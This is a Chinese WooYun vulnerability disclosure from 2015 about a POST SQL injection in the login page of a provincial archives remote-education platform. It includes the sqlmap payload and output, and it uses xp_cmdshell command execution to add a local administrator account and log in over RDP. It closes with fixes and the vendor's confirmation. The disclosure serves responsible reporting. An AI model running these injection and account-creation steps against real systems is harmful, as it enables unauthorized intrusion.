当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145663

漏洞标题:某省档案人员远程教育平台某系统存在SQL注射漏洞(成功内网)

相关厂商:cncert国家互联网应急中心

漏洞作者: 洞主

提交时间:2015-10-10 09:04

修复时间:2015-11-28 17:44

公开时间:2015-11-28 17:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-10: 细节已通知厂商并且等待厂商处理中
2015-10-14: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向核心白帽子及相关领域专家公开
2015-11-03: 细节向普通白帽子公开
2015-11-13: 细节向实习白帽子公开
2015-11-28: 细节向公众公开

简要描述:

不知道这个算不算成功内网了....时间太晚,没来得及进一步渗透。

详细说明:

问题url: **.**.**.**/

11.jpg


咋一看跟标题中的档案人员远程教育平台没有什么关系,好吧我也是后来才知道的。
存在SQL注入:
参数username存在 post型注入

POST /logincheck.asp HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: **.**.**.**/
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: UrlIP=221%2E226%2E47%2E68; ASPSESSIONIDCAQRRSCD=GIBBKNFAKAJLFDIHGLNDILJE
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Submit=%b5%c7%20%20%c2%bc&password=g00dPa%24%24w0rD&username=xfrysehi


直接上SQLMAP跑一下,结果如下:

[22:20:04] [INFO] parsing HTTP request from 'd:\2.txt'
[22:20:04] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:20:04] [INFO] testing connection to the target URL
[22:20:04] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to '**.**.**.**:80/error.asp'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[22:20:07] [INFO] heuristics detected web page charset 'GB2312'
[22:20:07] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit=%b5%c7  %c2%bc&password=g00dPa$$w0rD&username=xfrysehi';WAITFOR DELAY '0:0:5'--
---
[22:20:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:20:07] [INFO] fetching current user
[22:20:07] [INFO] resumed: sa
current user:    'sa'
[22:20:07] [INFO] testing if current user is DBA
current user is DBA:    True


可以看到是操作系统为windows,数据库用户名sa ,DBA权限。
测试发现其打开了3389端口
尝试使用os-cmd添加用户wooyun 密码wooyun(测试账号wooyun的密码被我改成了Wooyun@2015,乌云审核人员请注意)

D:\Program Files\Python 2.7.3\sqlmap>sqlmap.py -r d:\2.txt --os-cmd="net user wooyun wooyun /add"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151004}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:29:53
[22:29:53] [INFO] parsing HTTP request from 'd:\2.txt'
[22:29:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:29:53] [INFO] testing connection to the target URL
[22:29:53] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to '**.**.**.**:80/error.asp'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[22:29:55] [INFO] heuristics detected web page charset 'GB2312'
[22:29:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit=%b5%c7  %c2%bc&password=g00dPa$$w0rD&username=xfrysehi';WAITFOR DELAY '0:0:5'--
---
[22:29:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:29:55] [INFO] testing if current user is DBA
[22:29:55] [INFO] testing if xp_cmdshell extended procedure is usable
[22:29:59] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:30:16] [INFO] adjusting time delay to 1 second due to good response times
[22:30:25] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] n
[22:30:28] [INFO] cleaning up the database management system
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] n
[22:30:30] [INFO] database management system cleanup finished
[22:30:30] [WARNING] remember that UDF dynamic-link library files saved on the file system can only be deleted manually


将添加的用户wooyun 添加到administrators组

D:\Program Files\Python 2.7.3\sqlmap>sqlmap.py -r d:\2.txt --os-cmd="net localgroup administrators wooyun /add"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151004}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:32:38
[22:32:38] [INFO] parsing HTTP request from 'd:\2.txt'
[22:32:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:32:38] [INFO] testing connection to the target URL
[22:32:38] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to '**.**.**.**:80/error.asp'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[22:32:41] [INFO] heuristics detected web page charset 'GB2312'
[22:32:41] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit=%b5%c7  %c2%bc&password=g00dPa$$w0rD&username=xfrysehi';WAITFOR DELAY '0:0:5'--
---
[22:32:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:32:41] [INFO] testing if current user is DBA
[22:32:41] [INFO] testing if xp_cmdshell extended procedure is usable
[22:32:44] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:33:03] [INFO] adjusting time delay to 1 second due to good response times
[22:33:12] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] n
[22:33:18] [INFO] cleaning up the database management system
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] n
[22:33:19] [INFO] database management system cleanup finished
[22:33:19] [WARNING] remember that UDF dynamic-link library files saved on the file system can only be deleted manually


尝试用wooyun wooyun 登录,运行输入mstsc /admin,远程IP **.**.**.** 发现登陆成功:

22.jpg


7.jpg


这2张截图可以证明已经内网了把? 私有IP,路由关系,数据库备份、webroot。我们来看看这系统是干嘛用的,开始菜单,程序里见到了外网登录界面所看到的环境监控系统,见下图:

33.jpg


这是他们数据中心机房环境的监控系统。下面我来证明为什么说这是该省档案人员远程教育平台的内网,对内网地址尝试http登录,发现如下:
我们来看看:

5.jpg


44.jpg


重点来了:

6.jpg


江苏省档案远程教育平台。
度娘查到其互联网地址为:**.**.**.**
nslookup解析一下:

非权威应答:
名称:    **.**.**.**
Address:  **.**.**.**


与被远程主机IP相邻,应该可以证明了把。

漏洞证明:

问题url: **.**.**.**/

11.jpg


咋一看跟标题中的档案人员远程教育平台没有什么关系,好吧我也是后来才知道的。
存在SQL注入:
参数username存在 post型注入

POST /logincheck.asp HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: **.**.**.**/
Content-Length: 69
Content-Type: application/x-www-form-urlencoded
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: 082119f75623eb7abd7bf357698ff66c
Acunetix-Aspect-Queries: filelist;aspectalerts
Cookie: UrlIP=221%2E226%2E47%2E68; ASPSESSIONIDCAQRRSCD=GIBBKNFAKAJLFDIHGLNDILJE
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Submit=%b5%c7%20%20%c2%bc&password=g00dPa%24%24w0rD&username=xfrysehi


直接上SQLMAP跑一下,结果如下:

[22:20:04] [INFO] parsing HTTP request from 'd:\2.txt'
[22:20:04] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:20:04] [INFO] testing connection to the target URL
[22:20:04] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to '**.**.**.**:80/error.asp'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[22:20:07] [INFO] heuristics detected web page charset 'GB2312'
[22:20:07] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit=%b5%c7  %c2%bc&password=g00dPa$$w0rD&username=xfrysehi';WAITFOR DELAY '0:0:5'--
---
[22:20:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:20:07] [INFO] fetching current user
[22:20:07] [INFO] resumed: sa
current user:    'sa'
[22:20:07] [INFO] testing if current user is DBA
current user is DBA:    True


可以看到是操作系统为windows,数据库用户名sa ,DBA权限。
测试发现其打开了3389端口
尝试使用os-cmd添加用户wooyun 密码wooyun

D:\Program Files\Python 2.7.3\sqlmap>sqlmap.py -r d:\2.txt --os-cmd="net user wooyun wooyun /add"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151004}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:29:53
[22:29:53] [INFO] parsing HTTP request from 'd:\2.txt'
[22:29:53] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:29:53] [INFO] testing connection to the target URL
[22:29:53] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to '**.**.**.**:80/error.asp'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[22:29:55] [INFO] heuristics detected web page charset 'GB2312'
[22:29:55] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit=%b5%c7  %c2%bc&password=g00dPa$$w0rD&username=xfrysehi';WAITFOR DELAY '0:0:5'--
---
[22:29:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:29:55] [INFO] testing if current user is DBA
[22:29:55] [INFO] testing if xp_cmdshell extended procedure is usable
[22:29:59] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:30:16] [INFO] adjusting time delay to 1 second due to good response times
[22:30:25] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] n
[22:30:28] [INFO] cleaning up the database management system
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] n
[22:30:30] [INFO] database management system cleanup finished
[22:30:30] [WARNING] remember that UDF dynamic-link library files saved on the file system can only be deleted manually


将添加的用户wooyun 添加到administrators组

D:\Program Files\Python 2.7.3\sqlmap>sqlmap.py -r d:\2.txt --os-cmd="net localgroup administrators wooyun /add"
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20151004}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 22:32:38
[22:32:38] [INFO] parsing HTTP request from 'd:\2.txt'
[22:32:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[22:32:38] [INFO] testing connection to the target URL
[22:32:38] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to '**.**.**.**:80/error.asp'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n]
[22:32:41] [INFO] heuristics detected web page charset 'GB2312'
[22:32:41] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: Submit=%b5%c7  %c2%bc&password=g00dPa$$w0rD&username=xfrysehi';WAITFOR DELAY '0:0:5'--
---
[22:32:41] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[22:32:41] [INFO] testing if current user is DBA
[22:32:41] [INFO] testing if xp_cmdshell extended procedure is usable
[22:32:44] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:33:03] [INFO] adjusting time delay to 1 second due to good response times
[22:33:12] [INFO] xp_cmdshell extended procedure is usable
do you want to retrieve the command standard output? [Y/n/a] n
[22:33:18] [INFO] cleaning up the database management system
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] n
[22:33:19] [INFO] database management system cleanup finished
[22:33:19] [WARNING] remember that UDF dynamic-link library files saved on the file system can only be deleted manually


尝试用wooyun wooyun 登录,运行输入mstsc /admin,远程IP **.**.**.** 发现登陆成功:

22.jpg


7.jpg


这2张截图可以证明已经内网了把? 私有IP,路由关系,数据库备份、webroot。我们来看看这系统是干嘛用的,开始菜单,程序里见到了外网登录界面所看到的环境监控系统,见下图:

33.jpg


这是他们数据中心机房环境的监控系统。下面我来证明为什么说这是该省档案人员远程教育平台的内网,对内网地址尝试http登录,发现如下:
我们来看看:

5.jpg


44.jpg


重点来了:

6.jpg


江苏省档案远程教育平台。
度娘查到其互联网地址为:**.**.**.**
nslookup解析一下:

非权威应答:
名称:    **.**.**.**
Address:  **.**.**.**


与被远程主机IP相邻,应该可以证明了把。

修复方案:

1、修复sql注射漏洞,对关键字做过滤或使用安全的api
2、对互联网关闭3389端口,降低威胁。
3、删除我为测试而新建的管理员账户 wooyun
4、仅做了简单测试,未作任何其他操作。

版权声明:转载请注明来源 洞主@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-14 17:43

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给江苏分中心,由其后续协调网站管理单位处置.

最新状态:

暂无

漏洞评价:

评价